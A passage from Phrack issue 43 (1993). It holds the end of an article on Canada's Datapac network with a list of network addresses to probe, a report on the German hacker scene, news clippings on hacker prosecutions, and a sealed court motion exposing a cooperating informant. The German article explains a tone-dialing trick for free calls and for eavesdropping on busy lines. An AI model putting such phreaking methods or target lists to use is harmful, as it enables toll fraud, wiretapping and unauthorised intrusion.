characters that can be displayed on the terminal before the PAD must
send a format effector (i.e.., <CR><LF>).  This permits more data to
be transmitted in one packet while still letting the user print out
more than one line, i.e., printing out forms.

11)  Transmission Speed (Read only)

     This parameter is set by the PAD as a result of transmission
speed detection if the terminal accesses an autobaud port.  When a
private port with fixed speed is used, this parameter is set based
on the pre-stored information selected at subscription time.

Parameter Number:  11
Possible Values:    0 = 110 bps
                    2 = 300 bps
                    3 = 1200 bps
                    4 = 2400 bps
This is all very dry stuff (what buffer isn't?) however if you need more
info on it simply mail me.

                            NUA list
20500011                Bell Northern Research
39400100                Envoy (English/Francais)
30400101                Envoy (Anglais/French)
39500032                Globe and Mail
41100015,I              Infoglobe
59600072                University of Athabasca
60100010                Universtiy of Alberta
67100752                ?
67100673                ?
20400177                QL
29400138                Tymnet  CIS02 7770,101 'free demo'
20401338                Tymnet
41100043                CSG Infoglobe
73500023                KN Computer MCT
59100092                Keyano College (Alberta)
72400014                System Max-Daisey (VAX/VMS)
69100018                Cybershare
55500010                ?
29400263                ?
29400263                ?
67100086                Sears
67100132                Primenet
67100489                Terminal ID=VAX
67100629                (VAX/VMS)
67100632                McKim Advertising (Vancouver)
93200233                University of Manitoba
79400100                Envoy Info/Mailbox
92100086                Datapac General Info
20500011                Canole II

I have kept a number of sites I have, off this list simply
to ensure I keep them, however there are thousands of Virgin
sites available off of Dpac. Something to keep your eyes open for
are Canadian government machines which are fairly abundant on the
Dpac.

Beyond Dpac, there are some actual BBS's worth calling, most
however would rather not have there numbers published in Phrack. None
the less here are some stable, and relatively active BBS's:

     The Underground Subway  606-590-1147
     Gridpoint               403-283-5519
     The G-spot  (Rabid HQ)  416-256-9017
     Front 242   (VX)(Rabid) 416-790-6632

I am sorry for what this article did not cover, in the umpteen or so
pages  I have punched up, I still have covered not even a tenth
of what I would like to cover. For those who wish a reliable UG
bbs for list .ca or more info on the Dpac or wish to elicit any other
response to this article please e-mail me at besaville@sait.ab.ca

*********************************************************************

                    The German Scene
                      (by SevenUp)
                    ----------------

CCC
---

Talking about the German Hacker Scene, the Chaos Computer Club (CCC) comes
to most people's mind. They are most famous for their 'NASA-Hack' and their
publications like Hackerbibel and Datenschleuder, a monthly magazine talking
about 'softer' stuff than 2600, such as MUD's, the Internet and BBS'es.

They organize the annual Chaos Communication Congress, held annually
from December, 27th till 29th in Hamburg. Usually around 1000 people show up
there, discussing many different topics, such as Phreaking, Internet,
Women and Computer, Cellular Phones, Phone Cards and others. Many well-known
people, like Pengo and Professor Brunnstein the meeting. There are usually
also shows of Horror Movies (but no porns like at HohoCon), but it's not
a real 'party' like SummerCon or the upcoming Hacktic Party.

Another annually meeting from CCC members and many other hackers is at the
huge computer fare 'CeBit' in Hannover in March. The Get Together is at the
Telekom booth on Tuesday at 4pm. Usually Telekom (the German phone company)
representatives are very kind, give away phone cards (value: $4), but
usually don't have any interesting new informations.

There haven't been any hacks affiliated with the CCC for the last couple of
years. The CCC tries to get away from their former criminal image, talking
mostly about risks of computers in society, and producing lots of press
releases.

The KGB Hack
------------

Most of you might know "The Cuckoo's Egg" by Cliff Stoll. His exciting
novel talks about German Hackers hacking for the KGB.
These guys were using the German x.25 network Datex-P to get to a US
University, and from there to several hosts on the Arpa/Milnet (Internet).
They were using mostly basic knowledge to get into several UNIX and VMS
Systems, reading personal Mail and looking for documents the 'Russians'
might have been interested in.

It all ends up with the suicide (murder?) of Karl Koch, one of the hackers.
Although these hackers weren't CCC members, there is a pretty good book
from the CCC about it, containing more facts than Cliff's book:
"Hacker fuer Moskau", published by Wunderlich.

This is probably the best known German hack of all times.

Networks
--------

I. x.25

The German x.25 System is called 'Datex-P' and has the DNIC (2624).
Dialups are in almost every area code, or can be reached locally from
everywhere. There are also Tymnet and Sprintnet Dialups available in
the major cities, with some limitations though. Tymnet won't connect you
to dpac (Datapac Canada). Sprintnet has just a true dialup in Frankfurt,
the other dialups are handled by their partner Info AG, which allow
calling most RNUAs, but most Sprintnet NUIs won't work.

There is a 'Subnet' in the Datex-P Network, the so called 'WiN'
(which means scientific network). Almost all universities have connections
to the WiN, which means they pay a flat rate each month, which allows
them to make as many calls and transfer as much data to other WiN hosts,
as they like. Usually x.25 rates are charged by the volume of packages/data.
You can identify WiN addresses easily, because they start with
(0262)45050... There are many gateways from WiN to Internet, and also a few
from Internet to WiN. WiN NUAs can be reached without problem from any x.25
network in the world, like Sprintnet or Tymnet; though most WiN PADs will
refuse to connect to non-WiN NUAs.

There are also a couple of German systems, international hackers used to like.
The most-famous is probably Lutzifer in Hamburg, Germany. It can still
be reached from x.25 Networks like Sprintnet or Tymnet.
Around two years ago, British, American and other hackers used to trade
all kinds of codez on "Lutz". But now, Pat Sisson ("frenchkiss") from Sprintnet
Security and Dale Drew ("Bartman") from Tymnet Security, try to track
down everyone abusing their NUIs or PADs.

Before Lutzifer went up 2.5 years ago, tchh and Altos Munich were most
attractive. They were running the same simple Korn-Chat on an Altos.
There are still a couple of other x.25 Systems, which attract hackers
from all over the world, like qsd, Pegasus (in France and Switzerland) and
Secret Tectonics / sectec, a rather new semi-private Board in Germany with
x.25 and Direct Phone Dialups, uucp/Internet Mail, File and Message Bases and
all Phrack Issues as well.

II. Internet

But now, most hackers quit the x.25 scene and tried to get onto Internet.
Unlike the fast Internet connections in the USA between .edu sites,
German Internet connections are mostly routed through slow (9.6kbps or 64k)
x.25 Links.

This is mostly the fault of the German phone company 'Telekom'. They have a
monopoly on phone lines in Germany and charge 2-10 times higher fees than
American phone co's. Even local calls are US$1.50/hour.

There aren't many German Internet Sites that attract foreign hackers,
compared to US Sites that German Hackers are interested in.

There are almost no public Internet BBSes with free access in Germany.
Also, German Universities have often a pretty tight security and get
mad easily.

III. Amiga Kiddos

BBS'es are still the major hang-out besides IRC. The Amiga Scene with
its K-rad Kiddos (most of them under 18 years) used to be dominant a
couple of years ago, trading Calling Cards and new Blue Box frequencies
to call the best boards in the US to leech the latest games.
But recently, the IBM scene caught up and many guys switched from Amiga
to IBM; so over 50% of pirate boards are IBM boards now.

But recently, BBS sysops have to face hard times. A couple of months
ago, lots of BBS'es in Berlin, but also in Bavaria and North Germany
got 'busted' - raided by the police because of their illegal warez.
(see my article in Phrack 42 about it) The man behind these actions
is the lawyer 'Guenther Freiherr von Gravenreuth', who works for Acti-
vision, the SPA and BSA. He is tracking down kids with piracy as recklessly
as BBS Sysops, who sell subscriptions for a 'Disabled Upload/Download Ratio'
for around $100 a month. There have been a couple of these trials lately,
without much notice by the press. Mr Gravenreuth is also responsible for
many people's fear to put up a new BBS - especially in Bavaria where he lives.

Also, calling the favorite Board in the US is getting harder and harder,
as covered in the next Chapter.

IV. The Phone System

Blueboxing used to be the favorite sport of many German traders for the
last couple of years. But some phreakers wanted to make more money,
selling the Bluebox Story to Magazines like Capital or Spiegel, or to
TV Shows. Even AT&T and the German Telecom, who seemed to be blind about
this phreaking, couldn't avoid facing the truth now - they had to do
something, not only to recover from the huge losses, but also to save
their reputation.

There are a lot of rumors and text files about the actions these phone
companies took; most of them are fakes by 'eleet' people, who don't want
the 'lamers' to keep the trunks and the eleet boards busy. But some actions
seem to be certified; e. g. Telekom bought some intelligent filter boxes
from British Telecom. These boxes should detect any C5 tones (especially
2600 Hz), being sent by phreakers; and log the number of the phreaker,
if possible.

If possible, because the Telekom doesn't have ANI in most cases. Until
recently, all phone lines used to be analog, pulse dialing lines
with huge relay switches. Then the Telekom started switching to 'modern'
digitally switched lines, which allow Touch-Tone-Dialing, and also a few
other nice features, which I want to cover now.

One of these nice features 'died' just about 3 weeks ago, because someone
informed the new magazine 'Focus'.

The trick was very simple. All you need was a digital line which allowed
you to dial touch tone, and a 'Silver Box' - a device, that allows you to
dial the digits 0...9, #, * and also A, B, C and D - many modems have
this capability too.

All you had to do was to dial 'B' + 'xxx' + 'yyyy', where 'B' is the
Silver Tone B, 'xxx' is an internal Telekom code, and 'yyyy' are the last
four digits of a phone number. The internal codes 'xxx' usually look like
010, 223, 011, and so on - they switch you to an exchange, mostly in your
own area code, but often in a different one! Notice that exchange number and
internal code are different. When you are connected to a certain exchange,
dialing the four 'yyyy' digits connects you to a certain phone number in
that exchange. This enables you to make free calls - also to different area
codes, but you have to try around to find which code matches with which
exchange. But that's not all; now the fun just begins! Imagine the number
you dial is busy... you won't hear a busy signal then, you would just be
connected into the call! You could listen to the conversation of two parties!
Imagine how much fun this could be... and imagine someone would be listening
to your private conversations!

When Telekom read the article, most area codes lost this capability;
but there are still some reported to work.

Blueboxing is getting harder and harder, MCI and AT&T keep on changing their
'Break' frequencies more rapidly (though they still use in-band CCITT C5
signalling); so more and more people offer Calling Card subscriptions, and
even more traders, who refuse paying Telekom's high fees, buy them. They
are offered mostly by Americans, Belgium people and Germans, for about $100
a month. Also, I haven't heard of any case where a German got busted for
abusing AT&T's Calling Cards; probably because Telekom can't really trace
phones lines, either technically nor legally (they may not just 'tap' phone
lines because of people's privacy).

Also, German Toll Free Numbers (they start with 0130) are getting more and
more. I would take a guess and say they grow 20%-80% a year. There isn't any
official directory nor a directory assistance for these numbers, and many
companies want these numbers to remain 'unknown' to the evil hackers, since
Telekom is asking high fees for them.

So many Germans compile and scan these numbers; there is also a semi-public
list on them by SLINK - available on many BBS'es and on local German Newsgroups.
This list also contains numbers of business companies like Microsoft,
Hewlett Packard or Dell in Austin (hi erik :) ), so it is quite useful for
'normal people' too.

There have also been reported the first PBX-like Systems in Germany; this is
quite a sensation, because German Telekom laws don't allow PBX'es, or even the
linking of two phone lines (like 3-way calling). So in fact, these Systems
weren't real PBX'es, but Merial Mail VMB Systems with the Outdial feature.

PaRtY 0n!
---------

There are a couple of interesting get-togethers and parties.
I mentioned the annual Chaos Communication Congress after Christmas;
the CCC also has weekly meetings on Tuesday. There are the annual
CeBIT hacker parties, on the Tuesday at CeBIT in March. After the
CeBIT meeting and weekly, there are get-togethers  at the 'Bo22',
a cafe in Hannover. These meetings have tradition since the KGB
Hacks of Pengo and 'Hagbard Celine' Karl Koch, as I mentioned above.
You will still find friends of them there, if you drop by on a Tuesday.
Since a couple of months and with Emmanuel Goldstein's great support,
we are having 2600 meetings in Munich, Germany too! These are the first
2600 meetings outside of the US; the first meeting was quite successful
with over 30 people, and the next one in July will be successful too,
hopefully. Some international visitors from the US are expected, too.
These meetings are held at around 6pm in front of Burger King at
Central Station, Munich. I also like to thank Munich's Number One
Hit Radio Station 89 HIT FM at this point, for letting us into the
air for 3 minutes, talking about the 2600 meeting and a bit about 'hacking'.
There are also semi-annual IRC parties in Germany, but they are
'just' parties with usually 100-150 people. Hacking and phreaking
isn't a topic there; probably less than 10% of them know what H/P means.

--------------------------------------------------------------------------------


                              ==Phrack Magazine==

                 Volume Four, Issue Forty-Three, File 27 of 27

              PWN PWN PNW PNW PNW PNW PNW PNW PNW PNW PNW PWN PWN
              PWN                                             PWN
              PWN              Phrack World News              PWN
              PWN                                             PWN
              PWN        Compiled by Datastream Cowboy        PWN
              PWN                                             PWN
              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN


New Yorker Admits Cracking                              July 3, 1993
~~~~~~~~~~~~~~~~~~~~~~~~~~
(From AP Newswire Sources)

 Twenty-one-year-old Mark Abene of New York, known as "Phiber Optik" in
 the underground computing community, has pleaded guilty to charges he
 participated in a group that broke into computers used by phone companies
 and credit reporting services.

 The Reuter News Service says Abene was the last of the five young men
 indicted in the huge 1991 computer break-in scheme to admit committing the
 crimes. The group called itself "MOD," an acronym used for "Masters of
 Disaster" and "Masters of Deception."

 Abene pleaded guilty to one count of conspiracy and one count of
 unlawful access to computers. He faces a possible maximum prison term of
 10 years and fine of $500,000.

-----------------------------------------------------------------------------

China Executes Computer Intruder                        April 26, 1993
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
(From AP Newswire Sources)

 A man accused of invading a computer and embezzling some
 $192,000 has been executed in China.

 Shi Biao, an accountant at the Agricultural Bank of China's Jilin
 branch, was accused of forging deposit slips from Aug. 1 to
 Nov. 18, 1991.

 The crime was the first case of bank embezzlement via
 computer in China.  Authorities became aware of the plot
 when Shi and his alleged accomplice, Yu Lixin, tried to wire
 part of the money to Shenzhen in southern China.

-----------------------------------------------------------------------------

Teen Takes the A Train --- Literally                    May 13, 1993
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
(From AP Newswire sources)

 A 16 year old 10th grader successfully conveyed passengers on a NYC 10 car
 subway train for 2.5 hours until he went around a curve too quickly and
 could not reset the emergency brakes. Keron Thomas dressed as a NY subway
 train engineer impersonated Regoberto Sabio, a REAL subway motorman, while he
 was on vacation and even obtained Sabio's "pass number".

 Thomas was a Subway enthusiast who hung around train stations and areas
 where subway motormen and other subway workers hang out. A NYC subway
 spokesman was quoted as saying "Buffs like to watch...pretty soon they
 figure out how" [to run the train]. "This guy really knew what he was doing".

 Thomas was charged with criminal trespassing, criminal impersonation, and
 reckless endangerment.

-----------------------------------------------------------------------------

Banks React To Scheme That Used Phony ATM               May 13, 1993
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
(From AP Newswire Sources)

 At least three people are believed to be involved in an ATM scam that is
 thought to have netted roughly $ 60,000. The fraud was perpetrated by
 obtaining a real ATM machine (theorized to have been stolen from a warehouse)
 and placing it in a Connecticut shopping mall.

 When people attempted to use the machine, they received a message that the
 machine wasn't working correctly and gave back the card.  Little did they
 know that their bank account number and PIN code was recorded.  The fake
 machine was in place for about 2 weeks. It was removed and the thieves
 began making withdrawals.

 The Secret Service thinks the scammers recorded anywhere from 2000 to 3000
 account numbers/pin codes but did not get a chance to counterfeit
 and withdraw money except from a few hundred accounts before it
 became too dangerous to continue

-----------------------------------------------------------------------------

Hacker Gets Jail Time                                   June 5, 1993
~~~~~~~~~~~~~~~~~~~~~
(Newsday) (Page 13)

 A Brooklyn College film student, who was part of a group that allegedly broke
 into computer systems operated by major telephone companies, was sentenced
 yesterday to 1 year and 1 day in prison.

 John Lee, 21, of Bedford Stuyvesant, also was sentenced to 200 hours of
 community service, which Manhattan Federal District Court Judge Richard Owen
 recommended he spend teaching others to use computers.  Lee had pled guilty
 December 3, 1992, to a conspiracy charge involving computer tampering, fraud
 and illegal wiretapping.

_______________________________________________________________________________

Hacker Gets Prison Term For Phone Computer Tampering    June 4, 1993
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by Gail Appleson (The Reuter Business Report)

 NEW YORK -- A computer hacker known as "Corrupt" who was part of a group that
 broke into computer systems operated by major telephone companies was
 sentenced Friday to one year and one day in prison.

 The defendant, John Lee, 21, of New York had pleaded guilty December 3, 1992
 to a conspiracy charge involving computer tampering, fraud and illegal
 wiretapping.

 The indictment alleges the defendants broke into computer switching systems
 operated by Southwestern Bell, New York Telephone, Pacific Bell, U.S. West
 and Martin Marietta Electronics Information and Missile Group.

 Southwestern Bell allegedly lost $370,000 because of the crimes.

 The defendants also allegedly tampered with systems owned by the nation's
 largest credit reporting companies including TRW, Trans Union and Information
 America.  They allegedly obtained 176 TRW credit reports on various
 individuals.

 The indictment alleged the group broke into the computers "to enhance their
 image and prestige among other computer hackers and to harass and intimidate
 rival hackers and other people they did not like."
_______________________________________________________________________________

Professional Computer Hackers First To Land In Jail Under New Law  June 4, 1993
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by Nicholas Hills (The Vancouver Sunds)(Page A11)

LONDON -- In Brussels, they were celebrated as the two young men who broke the
gaudy secrets of EC president Jacques Delors' expense accounts.

In Sweden, they were known as the Eight-Legged Groove Machine, bringing down
part of the country's telephone network, forcing a highly publicized apology
from a government minister who said the chaos was all due to a 'technical
fault'.

They also broke into various European defense ministry networks, academic
systems at Hull University and the financial records of the leading London
bankers, S.G. Warburg.

No, these weren't two happy-go-lucky burglars; but rather, professional
computer hackers, aged 24 and 22, who made legal as well as technological
history by being the first offenders of this new trade to be jailed for their
crimes under new British law.

Neil Woods and Karl Strickland have gone to prison for six months each for
penetrating  computer  systems in 15 different countries.  The ease with which
they conducted this exercise, and their attitude that they were simply engaging
in "intellectual joyriding," has confirmed the worst fears of legal and
technological experts that computer hacking in Europe, at least, has become a
virtually uncontrollable virus.

The case became a cause celebre because of what had happened months before in
another courtroom where a teenage computer addict who had hacked into the White
House system, the EC, and even the Tokyo Zoo -- using a $400 birthday present
from his mother -- had walked free because a jury accepted, basically, that a
computer had taken over his mind.

The case of 19-year-old Paul Bedworth, who began hacking at the age of 14, and
is now studying "artificial intelligence" at Edinburgh University, provides an
insight into why hackers have turned the new computer world into an equivalent
state of delirium tremens.

Bedworth and two young friends caused thousands of dollars worth of damage to
computer systems in Britain and abroad. They were charged with criminal
conspiracy under the Computer Misuse Act of 1990.

Bedworth never did deny computer hacking at his trial, and did not give
evidence in his defense.  He simply said through his lawyer that there could
not have been any criminal intent because of his "pathological obsession" with
computers.

A jury of eight men and three women unanimously acquitted him.

Until the passage of the Computer Misuse Act in 1990, hacking was legal in
Britain.  Bedworth may have been found not guilty, but his activities were so
widespread that the authorities' investigation involved eight different British
police forces, and others from as far afield as Finland and Singapore.  It
produced so much evidence - mostly on disk - that if it had been printed out on
ordinary laser printer paper, it is estimated that the material would have
reached a height of 42 meters.

The police were devastated by the verdict, but are now feeling somewhat better
after the conviction of Woods and Strickland.

The pair, using the nicknames of Pad and Gandalf, would spend up to six hours a
day at their  computers,  boasting about "smashing" databases.

-----------------------------------------------------------------------------

Computers Turned My Boy Into A Robot                    March 18, 1993
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
By Martin Phillips (Daily Mirror)(Page 1)

 Connie Bedworth said she was powerless to control the "monster" as he
 glued himself to the screen nearly 24 hours as day.  "He didn't want
 to eat or sleep--he just couldn't bear to be away from it, " she said.

 A jury decided Paul Bedworth, now 19, was so "hooked" he could not stop
 himself hacking in to companies' systems -- allegedly costing them
 thousands of dollars.

-----------------------------------------------------------------------------

Hot For The Fingertips: An Internet Meeting Of Minds    May 23, 1993
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by Frank Bajak (Associated Press)

 NEW YORK -- Somewhere in the ether and silicon that unite two workstations 11
 floors above lower Broadway, denizens of the cyberpunk milieu are feverishly
 debating whether anyone in government can be trusted.

 This is the 12-by-20-foot bare-walled home of MindVox, today's recreation hall
 for the new lost generation's telecomputing crowd.  You can enter by phone
 line or directly off Internet.

 Patrick Kroupa and Bruce Fancher are the proprietors, self-described former
 Legion of Doom telephone hackers who cut the cord with computing for a time
 after mid-1980s teen-age shenanigans.

 Kroupa is a towering 25-year-old high school dropout in a black leather jacket,
 with long hair gathered under a gray bandanna, three earrings and a hearty
 laugh.

 Fancher is 22 and more businesslike, but equally in love with this dream he
 left Tufts University for.

 They've invested more than $80,000 into Mindvox, which went fully operational
 in November and has more than 2,000 users, who pay $15 to $20 a month plus
 telephone charges.

 MindVox aspires to be a younger, harder-edged alternative to the WELL, a
 fertile 8-year-old watering hole for the mind in Sausalito, California, with
 more than 7,000 users, including scores of computer age luminaries.

 One popular feature is a round-table discussion on computer theft and security
 hosted by a U.S. Treasury agent.  The latest hot topic is the ease of breaking
 into a new flavor of local access network.

-----------------------------------------------------------------------------

Hi Girlz, See You In Cyberspace                         May 1993
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by Margie (Sassy Magazine) (Page 79)

 [Margie hits the net via Mindvox.  Along the way she discovers
  flame wars, sexism, and a noted lack of females online.  This
  is her story.  :) ]

-----------------------------------------------------------------------------

Hacker Accused of Rigging Radio Contests                April 22, 1993
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
By Don Clark (San Francisco Chronicle)

 A notorious hacker was charged yesterday with using computers to
 rig promotional contest at three Los Angeles radio stations, in
 a scheme that allegedly netted two Porsches, $20,000 in cash and
 at least two trips to Hawaii.

 Kevin Lee Poulsen, now awaiting trial on earlier federal charges,
 is accused of conspiring with two other hackers to seize control of
 incoming phone lines at the radio stations.  By making sure that only
 their calls got through, the conspirators were assured of winning the
 contests, federal prosecutors said.

 A new 19-count federal indictment filed in Los Angeles charges
 that Poulsen also set up his own wire taps and hacked into computers
 owned by California Department of Motor Vehicles and Pacific Bell.
 Through the latter, he obtained information about the undercover
 businesses and wiretaps run by the FBI, the indictment states.

 Poulsen, 27, is accused of committing the crimes during 17
 months on the lam from earlier charges of telecommunications and
 computers fraud filed in San Jose.  He was arrested in April 1991
 and is now in the federal Correctional Institution in Dublin.  In
 December, prosecutors added an espionage charge against him for his
 alleged theft of a classified military document.

 The indictment announced yesterday adds additional charges of
 computer and mail fraud, money laundering, interception of wire
 communications and obstruction of justice.

 Ronald Mark Austin and Justin Tanner Peterson have pleaded guilty
 to conspiracy and violating computer crime laws and have agreed to
 help against Poulsen.  Both are Los Angeles residents.

 Poulsen and Austin have made headlines together before.  As
 teenagers in Los Angeles, the two computer prodigies allegedly broke
 into a Pentagon-organized computer network that links researchers and
 defense contractors around the country.

-----------------------------------------------------------------------------

SPA Tracks Software Pirates on Internet                 March 22, 1993
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
By Shawn Willett (InfoWorld)(Page 12)

 The Software Publishers Association has begun investigating reports of
 widespread piracy on the Internet, a loose amalgam of thousands of computer
 networks.

 The Internet, which began as a Unix-oriented, university-based communi-
 cations network, now reaches into corporate and government sites in 110
 countries and is growing at a rapid pace.

 The software theft, according to Andrew Patrizio, an editor at the
 _Software Industry Bulletin_, has been found on certain channels, particularly
 the warez channel.

 "People are openly talking about pirating software; there seems to be no
 one there to monitor it", Patrizio said.

 A major problem with the Internet is that the "sites" from where the
 software is being illegally downloaded can physically be located in countries
 that do not have strong antipiracy laws, such as Italy or the former Soviet
 Union.  The Internet also has no central administrator or system operator.

 "Policing the entire Internet would be a job", said Peter Beruk,
 litigation manager for the SPA, in Washington.  "My feeling would be to target
 specific sections that are offering a lot of commercial software free for the
 download", he said.

---------------------------------------------------------------------------

Socialite's Son Will Have To Pay $15,000 To
Get His Impounded 1991 BMW Back                         March 23, 1993
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
By John Makeig (Houston Chronicle)(Page 14A)

 Kenyon Shulman, son of Houston socialite Carolyn Farb will have to pay
 15 thousand dollars to get back his 1991 BMW 325i after being impounded
 when Houston police found 400 doses of the drug ecstasy in its trunk.

 This is just the latest brush with authorities for Shulman who in 1988
 was raided by Harris County authorities for using his personal computer
 to crack AT&T codes to make free long distance calls.

--------------------------------------------------------------------------

Austin Man Gets 10 Years For Computer Theft, Sales      May 6, 1993
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
By Jim Phillips (Austin American Statesman)(Page B3)

 Jason Copson, who was arrested in July under his alias Scott Edward Berry,
 has been sentenced to 10 years on each of four charges of burglary and
 one count of assault.  The charges will run concurrently.  Copson still
 faces charges in Maryland and Virginia where he served a prison term and
 was serving probation for dealing in stolen goods.  Police arrested Copson
 and Christopher Lamprecht on July 9 during a sting in which the men tried to
 sell computer chips stolen from Advanced Micro Devices.

---------------------------------------------------------------------------
Treasury Told Computer Virus Secrets                  June 19, 1993
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
By: Joel Garreau (Washington Post) (Page A01)

 For more than a year, computer virus programs that can wreak havoc with
 computer systems throughout the world were made available by a U.S. government
 agency to anyone with a home computer and a modem, officials acknowledged this
 week.

 At least 1,000 computer users called a Treasury Department telephone number,
 spokesmen said, and had access to the virus codes by tapping into the
 department's Automated Information System bulletin board before it was muzzled
 last month.

 The bulletin board, run by a security branch of the Bureau of Public Debt in
 Parkersburg, W.Va., is aimed at professionals whose job it is to combat such
 malicious destroyers of computer files as "The Internet Worm," "Satan's Little
 Helper" and "Dark Avenger's Mutation Engine." But nothing blocked anyone else
 from gaining access to the information.

 Before the practice was challenged by anonymous whistleblowers, the bulletin
 board offered "recompilable disassembled virus source code"-that is, programs
 manipulated to reveal their inner workings. The board also made available
 hundreds of "hackers' tools"-the cybernetic equivalent of safecracking aids.
 They included "password cracker" software-various programs that generate huge
 volumes of letters and numbers until they find the combination that a computer
 is programmed to recognize as authorizing access to its contents-and "war
 dialers," which call a vast array of telephone numbers and record those hooked
 to a computer.

 The information was intended to educate computer security personnel,
 according to Treasury spokesmen. "Until you understand how penetration is done,
 you can't secure your system," said Kim Clancy, the bulletin board's operator.

 The explosion of computer bulletin boards-dial-up systems that allow users
 to trade any product that can be expressed in machine-readable zeros and
 ones-has also added to the ease of virus transmission, computer analysts say.
 "I am Bulgarian and my country is known as the home of many productive virus
 writers, but at least our government has never officially distributed viruses,"
 wrote Vesselin Vladimirov Bontchev of the Virus Test Center of the University
 of Hamburg, Germany.

 At first, the AIS bulletin board contained only routine security alert
 postings. But then operator Clancy "began to get underground hacker files and
 post them on her board," said Bruce Sterling, author of "The Hacker Crackdown:
 Law and Disorder on the Electronic Frontier." "She amassed a truly impressive
 collection of underground stuff. If you don't read it, you don't know what's
 going to hit you."

 Clancy, 30, who is a former Air Force bomb-squad member, is highly regarded
 in the computer security world. Sterling, one of the nation's foremost writers
 about the computer underground, called her "probably the best there is in the
 federal government who's not military or NSA (National Security Agency).
 Probably better than most CIA."

 Clancy, meanwhile, is staying in touch with the underground. In fact, this
 week, she said, she was "testing a product for some hackers." Before it goes
 into production, she will review it to find potential bugs. It is a new war
 dialer called "Tone-Loc." "It's an extremely good tool. Saves me a lot of
 trouble. It enables me to run a hack against my own phone system faster" to
 determine points of vulnerability.

-----------------------------------------------------------------------------

        [AGENT STEAL -- WORKING WITH THE FEDS]


         IN THE UNITED STATES DISTRICT COURT

         FOR THE NORTHERN DISTRICT OF TEXAS

                  DALLAS DIVISION
         -----------------------------------

THE UNITED STATES OF AMERICA   *
                               *
V.                             * CRIMINAL NO. 3-91-194-T
                               * (FILED UNDER SEAL)
JUSTIN TANNER PETERSEN (1)     *

JOINT MOTION TO SEAL

     COMES NOW the United States of America, by its United

States Attorney, at the request of the defendant, and hereby

requests that this Honorable Court seal the record in this case.

In support thereof, the United States states the following:

     1. The case is currently being transferred to the

Middle District of California for plea and disposition pursuant

to Federal Rule of Criminal Procedure 20;

     2. The defendant is released on bond by the United

States District Court for the Middle District of California;

     3. The defendant, acting in an undercover capacity,

currently is cooperating with the United States in the

investigation of other persons in California; and

     4. The United States believes that the disclosure of

the file in this case could jeopardize the aforesaid

investigation and possibly the life of the defendant.

Consequently, the United States requests that this Honorable

Court seal the record in this case.

               Respectfully submitted,
               MARVIN COLLINS
               United States Attorney



               LEONARD A. SENEROTE
               Assistant United States Attorney
               Texas State Bar No. 18024700
               1100 Commerce Street, Room 16G28
               Dallas, Texas 75242-1699
               (214) 767-0951

          CERTIFICATE OF CONFERENCE

     The defendant joins in this motion.



               LEONARD A. SENEROTE
               Assistant United States Attorney


[The entire file of information gathered from the courts regarding
 Agent Steal is available from Phrack for $5.00 + $2 postage]
 -------------------------------------------------------------------------


--------------------------------------------------------------------------------